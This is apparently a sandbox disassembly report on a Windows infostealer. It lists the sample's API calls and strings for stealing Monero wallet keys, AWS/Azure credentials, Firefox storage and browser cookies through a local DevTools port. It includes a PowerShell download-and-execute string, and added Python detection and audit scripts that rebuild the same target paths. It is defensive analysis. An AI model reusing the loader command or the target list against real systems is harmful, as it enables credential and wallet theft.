                                • Opcode ID: 2a280c4ee5f5f8db12d1d6ba2dd3ca4978ce077477d9a28a11e732ba155fe402
                                • Instruction ID: 9b37d2039c77363fe09241c8db43d7d62adfe3c1b2f5dbb93f998381020518a1
                                • Opcode Fuzzy Hash: 2a280c4ee5f5f8db12d1d6ba2dd3ca4978ce077477d9a28a11e732ba155fe402
                                • Instruction Fuzzy Hash: CE02B470D016059BDB21EF68CA89FEE7BB9EF84310F554128F805A7251DB34EC85CB91
                                APIs
                                  • Part of subcall function 009B1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B1135
                                  • Part of subcall function 009B1120: RtlAllocateHeap.NTDLL(00000000), ref: 009B113C
                                  • Part of subcall function 009B1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 009B1159
                                  • Part of subcall function 009B1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 009B1173
                                  • Part of subcall function 009B1120: RegCloseKey.ADVAPI32(?), ref: 009B117D
                                • lstrcat.KERNEL32(?,00000000), ref: 009B11C0
                                • lstrlen.KERNEL32(?), ref: 009B11CD
                                • lstrcat.KERNEL32(?,.keys), ref: 009B11E8
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B121F
                                • lstrlen.KERNEL32(010C88C8), ref: 009B122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1251
                                • lstrcat.KERNEL32(00000000,010C88C8), ref: 009B1259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 009B1264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 009B1294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B12BA
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B12FF
                                • lstrlen.KERNEL32(010CD280), ref: 009B130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1335
                                • lstrcat.KERNEL32(00000000,?), ref: 009B133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1378
                                • lstrcat.KERNEL32(00000000), ref: 009B1385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B13AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 009B13D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1401
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B143D
                                  • Part of subcall function 009CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 009CEE12
                                • DeleteFileA.KERNEL32(?), ref: 009B1471
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: b9953572505d70d5136f1cd807f98349690f85bc2f021091fd33595350ffc693
                                • Instruction ID: 50cd4e4e0d4ab26c63d80eb814616956c31af8b6490795c5a499280d0a3c6ad3
                                • Opcode Fuzzy Hash: b9953572505d70d5136f1cd807f98349690f85bc2f021091fd33595350ffc693
                                • Instruction Fuzzy Hash: 78A16D71A11206ABDB21EFA4DE99BEE77B9EF84320F444024F905E7251EF30DD458B90
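The call sequence in the entry above (RegOpenKeyExA on HKCU\SOFTWARE\monero-project\monero-core with access mask 0x20119, which is KEY_READ | KEY_WOW64_64KEY, so the 64-bit registry view is requested explicitly; RegQueryValueExA of wallet_path; lstrcat of ".keys"; a second path ending in \Monero\wallet.keys; CopyFileA with bFailIfExists = 1; then DeleteFileA) is consistent with the wallet key file being copied to a staging location and the copy removed after use. The Python below is an added example, not code from the report or from the sample. It rebuilds the two candidate key-file paths (the prefix of the second path is resolved at run time at 010C88C8 and is not visible here; the example assumes the user's Documents folder, the Monero GUI default) and flags the create-then-delete pattern in Sysmon file events. The events in the block are constructed for illustration.

```python
"""Monero wallet targeting from the listing above, and a Sysmon-side check for
the CopyFileA -> DeleteFileA staging it performs. Added example, not the
sample's or the report's code; the events at the bottom are constructed."""
from datetime import datetime

MONERO_KEY = r"SOFTWARE\monero-project\monero-core"   # HKCU, opened with 0x20119


def read_wallet_path():
    """Read the same value the sample reads: HKCU\\...\\monero-core\\wallet_path
    from the 64-bit registry view (0x20119 = KEY_READ | KEY_WOW64_64KEY).
    Returns None off Windows or when the key/value is absent."""
    try:
        import winreg
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, MONERO_KEY, 0,
                            winreg.KEY_READ | winreg.KEY_WOW64_64KEY) as key:
            return winreg.QueryValueEx(key, "wallet_path")[0]
    except OSError:
        return None


def monero_key_paths(wallet_path_value, documents_dir):
    """Candidate key files, in the order the routine builds them:
    1. <wallet_path> + '.keys'  (the GUI wallet keeps keys next to the wallet);
    2. <prefix> + '\\Monero\\wallet.keys', where the prefix (010C88C8) is
       resolved at run time and is not visible in the report.
       ASSUMPTION: it is the user's Documents folder."""
    paths = []
    if wallet_path_value:
        paths.append(wallet_path_value + ".keys")
    paths.append(documents_dir.rstrip("\\") + "\\Monero\\wallet.keys")
    return paths


def _utc(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def staged_copy_then_delete(events, window_s=60, suffix=".keys"):
    """Flag a process that creates a file ending in `suffix` (Sysmon EID 11,
    which is what CopyFileA produces at its destination) and deletes that same
    file (EID 23 or 26) within `window_s` seconds. A legitimate wallet writing
    its own key file and leaving it in place does not match."""
    created = {}
    alerts = []
    for ev in sorted(events, key=_utc):
        name = ev["TargetFilename"].lower()
        if not name.endswith(suffix):
            continue
        key = (ev["ProcessId"], name)
        if ev["EventID"] == 11:
            created[key] = _utc(ev)
        elif ev["EventID"] in (23, 26) and key in created:
            age = (_utc(ev) - created.pop(key)).total_seconds()
            if age <= window_s:
                alerts.append({"Image": ev["Image"],
                               "file": ev["TargetFilename"], "seconds": age})
    return alerts


# Constructed Sysmon-style events (not from the report): a stealer staging a
# copy and deleting it 2.3 s later, then a wallet writing its own key file.
SAMPLE_EVENTS = [
    {"UtcTime": "2024-11-22 10:15:01.100", "EventID": 11, "ProcessId": 4120,
     "Image": r"C:\Users\u\AppData\Local\Temp\file.exe",
     "TargetFilename": r"C:\Users\u\AppData\Local\Temp\wallet.keys"},
    {"UtcTime": "2024-11-22 10:15:03.400", "EventID": 23, "ProcessId": 4120,
     "Image": r"C:\Users\u\AppData\Local\Temp\file.exe",
     "TargetFilename": r"C:\Users\u\AppData\Local\Temp\wallet.keys"},
    {"UtcTime": "2024-11-22 10:15:05.000", "EventID": 11, "ProcessId": 2200,
     "Image": r"C:\Program Files\Monero GUI Wallet\monero-wallet-gui.exe",
     "TargetFilename": r"C:\Users\u\Documents\Monero\wallets\main\main.keys"},
]

if __name__ == "__main__":
    wp = read_wallet_path()                      # None unless run on Windows
    for p in monero_key_paths(wp, r"C:\Users\u\Documents"):   # Documents path assumed
        print("would read:", p)
    for a in staged_copy_then_delete(SAMPLE_EVENTS):
        print("staged copy removed after %.1fs: %s by %s"
              % (a["seconds"], a["file"], a["Image"]))
```

Keying the match on (ProcessId, filename) keeps a wallet's own save/rewrite cycle from firing; lower the window or restrict the Image to unsigned binaries under %TEMP% if the rule is too broad on hosts that run wallet software.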
                                APIs
                                • memset.MSVCRT ref: 009CE740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009CE769
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE79F
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 009CE7C6
                                • memset.MSVCRT ref: 009CE805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009CE82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE85F
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 009CE886
                                • memset.MSVCRT ref: 009CE8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009CE8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE920
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 009CE947
                                • memset.MSVCRT ref: 009CE986
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: 2b6b5d7276697787da7dcd70629fc2bb02fa7ff3f5c89c091ea231c99de5fbba
                                • Instruction ID: b346fadba450e5d56c1879ec3798fa93d312518b7c824dd28edf597d19d893a1
                                • Opcode Fuzzy Hash: 2b6b5d7276697787da7dcd70629fc2bb02fa7ff3f5c89c091ea231c99de5fbba
                                • Instruction Fuzzy Hash: 9171FC71E40259ABDB21EBA4DD46FED7378EF88700F400898B71AAB1C1DF709E488B55
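The routines at 009C6445, 009C43A3, 009C57D5 and 009CE740 all build their targets the same way: SHGetFolderPathA with a CSIDL (0x1A = CSIDL_APPDATA, 0x1C = CSIDL_LOCAL_APPDATA, 0x28 = CSIDL_PROFILE), lstrcat of a fixed suffix (\storage\default\ plus .metadata-v2 per entry, \.azure\, \.aws\, \.IdentityService\ where msal.cache is kept), then GetFileAttributesA or a *.* enumeration to see what exists. The Python below is an added example, not code from the report or from the sample. It resolves the same CSIDLs from the environment, rebuilds the directories, and lists what a stealer with this logic would reach on a profile. The base path for the storage\default walk is not visible in the listings; the example assumes a Firefox profile directory.

```python
"""Rebuild the credential-store paths implied by the SHGetFolderPathA/lstrcat
chains in this report and audit a profile for them. Added example; nothing here
is the sample's own code. The CSIDL folders are read from a dict, so the audit
runs on any OS and can be pointed at any directory tree."""
import os
from pathlib import Path

# CSIDL values passed to SHGetFolderPathA in the listings above, mapped to the
# environment variable that names the same folder on Windows
# (0x1A CSIDL_APPDATA, 0x1C CSIDL_LOCAL_APPDATA, 0x28 CSIDL_PROFILE).
CSIDL_ENV = {0x1A: "APPDATA", 0x1C: "LOCALAPPDATA", 0x28: "USERPROFILE"}


def resolve_csidl(csidl, env):
    """Stand-in for SHGetFolderPathA(NULL, csidl, NULL, 0, buf)."""
    return env[CSIDL_ENV[csidl]]


def cloud_credential_dirs(env):
    """Directories built by the routine at 009CE740:
    CSIDL_PROFILE + \\.azure\\, CSIDL_PROFILE + \\.aws\\,
    CSIDL_LOCAL_APPDATA + \\.IdentityService\\ (where msal.cache lives)."""
    profile = resolve_csidl(0x28, env)
    local = resolve_csidl(0x1C, env)
    return [
        os.path.join(profile, ".azure"),
        os.path.join(profile, ".aws"),
        os.path.join(local, ".IdentityService"),
    ]


def firefox_storage_origins(profile_dir):
    """The routine at 009C43A3 appends \\storage\\default\\ to a base path, then
    an entry name and .metadata-v2, and calls GetFileAttributesA on the result.
    ASSUMPTION: the base path is a Firefox profile directory. Returns the
    origin directories that pass that existence check."""
    default = Path(profile_dir) / "storage" / "default"
    if not default.is_dir():
        return []
    return sorted(str(d) for d in default.iterdir()
                  if d.is_dir() and (d / ".metadata-v2").is_file())


def audit(env, firefox_profile_dirs=()):
    """List every file or origin these routines would reach. The *.* string in
    the 009CE740 routine points to a FindFirstFile walk of each directory, so
    every regular file inside is reported, not only msal.cache."""
    hits = []
    for d in cloud_credential_dirs(env):
        p = Path(d)
        if p.is_dir():
            hits.extend(str(f) for f in sorted(p.iterdir()) if f.is_file())
    for ff in firefox_profile_dirs:
        hits.extend(firefox_storage_origins(ff))
    return hits


if __name__ == "__main__":
    env = dict(os.environ)          # on Windows the CSIDL folders are right here
    if all(v in env for v in CSIDL_ENV.values()):
        profiles = Path(env["APPDATA"]) / "Mozilla" / "Firefox" / "Profiles"
        ff_dirs = [p for p in profiles.iterdir() if p.is_dir()] if profiles.is_dir() else []
        for hit in audit(env, ff_dirs):
            print("exposed:", hit)
```

Anything the audit prints is readable by any process running as the user, which is exactly the sample's privilege level; the practical mitigations are removing stale ~/.aws and ~/.azure credential files and keeping msal.cache protected by the platform keyring rather than plaintext.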
                                APIs
                                • lstrcpy.KERNEL32 ref: 009CABCF
                                • lstrlen.KERNEL32(010CEA68), ref: 009CABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009CAC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009CAC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CACB7
                                • lstrlen.KERNEL32(009E4AD4), ref: 009CACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CACF3
                                • lstrcat.KERNEL32(00000000,009E4AD4), ref: 009CACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAD28
                                • lstrlen.KERNEL32(009E4AD4), ref: 009CAD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAD5C
                                • lstrcat.KERNEL32(00000000,009E4AD4), ref: 009CAD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAD91
                                • lstrlen.KERNEL32(010CEA98), ref: 009CADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009CADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CAE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009CAE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CAE6F
                                • lstrlen.KERNEL32(00000000), ref: 009CAE85
                                • lstrcpy.KERNEL32(00000000,010CEAC8), ref: 009CAEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: 20d9cfdd869fc4331d266b37f18397c0e1cbeb9764253d9f28cc48eddda895f9
                                • Instruction ID: f8a9e2b738de81a28da44bfbbc34dd080b989a877565069b2a35e984ae1245aa
                                • Opcode Fuzzy Hash: 20d9cfdd869fc4331d266b37f18397c0e1cbeb9764253d9f28cc48eddda895f9
                                • Instruction Fuzzy Hash: 05B18F3091151A9BCB22EFA4DE88BAFB7B9EF80315F044528B815E7291DF34DD05CB92
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,009C72A4), ref: 009D47E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 009D47FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 009D480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 009D481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 009D482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 009D4840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 009D4851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 009D4862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 009D4873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 009D4884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 009D4895
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 18c4f5b5de22682c8faa475c9339ad63a78d097e733c3dbbd9c7e28093ec4ab6
                                • Instruction ID: 1e32a0028f845f74ce04376ed96134ea0a65cba3676b00b5dd7ed9a067052eab
                                • Opcode Fuzzy Hash: 18c4f5b5de22682c8faa475c9339ad63a78d097e733c3dbbd9c7e28093ec4ab6
                                • Instruction Fuzzy Hash: EC118EB1856BE0BFC311DFB6AC8DA563AB8BE4970D345081AF044DF161DEF48904CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CBE53
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CBE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 009CBE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CBEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 009CBEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CBEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009CBEEB
                                • lstrlen.KERNEL32(')"), ref: 009CBEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CBF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 009CBF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CBF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 009CBF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CBF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 009CBF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CBFBA
                                • ShellExecuteEx.SHELL32(?), ref: 009CC00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: ebf020fb15ff917fbaf140c5d669d372465f6f394a900e05783daa445165dc41
                                • Instruction ID: 9b67eafb8e2f528960d26d7b3f4df7ce6e9cd8a1f512fc0e47b7c76703106f47
                                • Opcode Fuzzy Hash: ebf020fb15ff917fbaf140c5d669d372465f6f394a900e05783daa445165dc41
                                • Instruction Fuzzy Hash: 36618171E102569BCB21AFB59E8ABEE7BADEF84710F04442DF509E7241DB34C9058B92
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D184F
                                • lstrlen.KERNEL32(010B7060), ref: 009D1860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D18C1
                                • lstrlen.KERNEL32(009E4FA0), ref: 009D18D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D18F4
                                • lstrcat.KERNEL32(00000000,009E4FA0), ref: 009D1900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D192F
                                • lstrlen.KERNEL32(010B6FB0), ref: 009D1945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D19A6
                                • lstrlen.KERNEL32(009E4FA0), ref: 009D19B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D19D9
                                • lstrcat.KERNEL32(00000000,009E4FA0), ref: 009D19E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1A14
                                • lstrlen.KERNEL32(010B6FE0), ref: 009D1A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1A8B
                                • lstrlen.KERNEL32(010B6FC0), ref: 009D1AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1B02
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: 5ab09540af48aaa287cc63555f8b4f20f774e85a9eefaf62a8fb34c012191e86
                                • Instruction ID: 92f0dfeb403ccee24e3f0fe62cf3b5f8b3f6f72d6a80dd9c7ac05ae8dc370c2f
                                • Opcode Fuzzy Hash: 5ab09540af48aaa287cc63555f8b4f20f774e85a9eefaf62a8fb34c012191e86
                                • Instruction Fuzzy Hash: 63916DB2641743ABDB20EFB5DE88A56B7ECEF44310B14882AA886D7351DF34E845CB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 009C47C5
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C4812
                                • lstrlen.KERNEL32(009E4B60), ref: 009C481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C483A
                                • lstrcat.KERNEL32(00000000,009E4B60), ref: 009C4846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C48A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C48CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 009C48DC
                                • lstrlen.KERNEL32(?), ref: 009C48F0
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C4931
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C49B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C49E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: 0c5974019042d12f68fe18988ad2773118f1135e6fd69db14d043c41b774854d
                                • Instruction ID: a2139c567053e03b34e04ddd8cfab8250daa03961d6b6468024e07d687c6267c
                                • Opcode Fuzzy Hash: 0c5974019042d12f68fe18988ad2773118f1135e6fd69db14d043c41b774854d
                                • Instruction Fuzzy Hash: 4BB1A271E112469BDB21EFB8DA95BDE77B9EF84310F054428F846AB351DB30EC058B91
                                APIs
                                  • Part of subcall function 009B90C0: InternetOpenA.WININET(009DCFEC,00000001,00000000,00000000,00000000), ref: 009B90DF
                                  • Part of subcall function 009B90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 009B90FC
                                  • Part of subcall function 009B90C0: InternetCloseHandle.WININET(00000000), ref: 009B9109
                                • strlen.MSVCRT ref: 009B92E1
                                • strlen.MSVCRT ref: 009B92FA
                                  • Part of subcall function 009B8980: std::_Xinvalid_argument.LIBCPMT ref: 009B8996
                                • strlen.MSVCRT ref: 009B9399
                                • strlen.MSVCRT ref: 009B93E6
                                • lstrcat.KERNEL32(?,cookies), ref: 009B9547
                                • lstrcat.KERNEL32(?,009E1794), ref: 009B9559
                                • lstrcat.KERNEL32(?,?), ref: 009B956A
                                • lstrcat.KERNEL32(?,009E4B98), ref: 009B957C
                                • lstrcat.KERNEL32(?,?), ref: 009B958D
                                • lstrcat.KERNEL32(?,.txt), ref: 009B959F
                                • lstrlen.KERNEL32(?), ref: 009B95B6
                                • lstrlen.KERNEL32(?), ref: 009B95DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B9614
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 71416f23d3be3ee3617be407e1872ed2f74f3d278ab15d434cd2c991e6c94b56
                                • Instruction ID: 937297c0ef31f211921374d22d73ed3d7a6098f89a9c4daac61645c993613950
                                • Opcode Fuzzy Hash: 71416f23d3be3ee3617be407e1872ed2f74f3d278ab15d434cd2c991e6c94b56
                                • Instruction Fuzzy Hash: 68E12671E10259DBDF10DFA8DA84BDEBBB5BF88310F1044A9E609A7281DB709E45CF90
                                APIs
                                • memset.MSVCRT ref: 009CD9A1
                                • memset.MSVCRT ref: 009CD9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CD9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CDA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 009CDA1C
                                • lstrcat.KERNEL32(?,010CED38), ref: 009CDA36
                                • lstrcat.KERNEL32(?,?), ref: 009CDA4A
                                • lstrcat.KERNEL32(?,010CD1A8), ref: 009CDA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CDA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009CDA95
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CDAFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: fda2567214a027fc8272a54929315f91cd96d40f914d620fcba215501e5df9ce
                                • Instruction ID: 165a7056cfba96dc5e6e7c9e62fe35d5bc37d8551bf268e3ac76b99d76ea6b6c
                                • Opcode Fuzzy Hash: fda2567214a027fc8272a54929315f91cd96d40f914d620fcba215501e5df9ce
                                • Instruction Fuzzy Hash: CFB19EB1D112599FDB10EFA4DD84EEEB7B9EF88300F144969F90AE7241DA309E44CB91
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BB330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BB3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB3D9
                                • lstrlen.KERNEL32(009E4C50), ref: 009BB450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB474
                                • lstrcat.KERNEL32(00000000,009E4C50), ref: 009BB480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB4A9
                                • lstrlen.KERNEL32(00000000), ref: 009BB52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BB55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB587
                                • lstrlen.KERNEL32(009E4AD4), ref: 009BB5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB622
                                • lstrcat.KERNEL32(00000000,009E4AD4), ref: 009BB62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB65E
                                • lstrlen.KERNEL32(?), ref: 009BB767
                                • lstrlen.KERNEL32(?), ref: 009BB776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB79E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
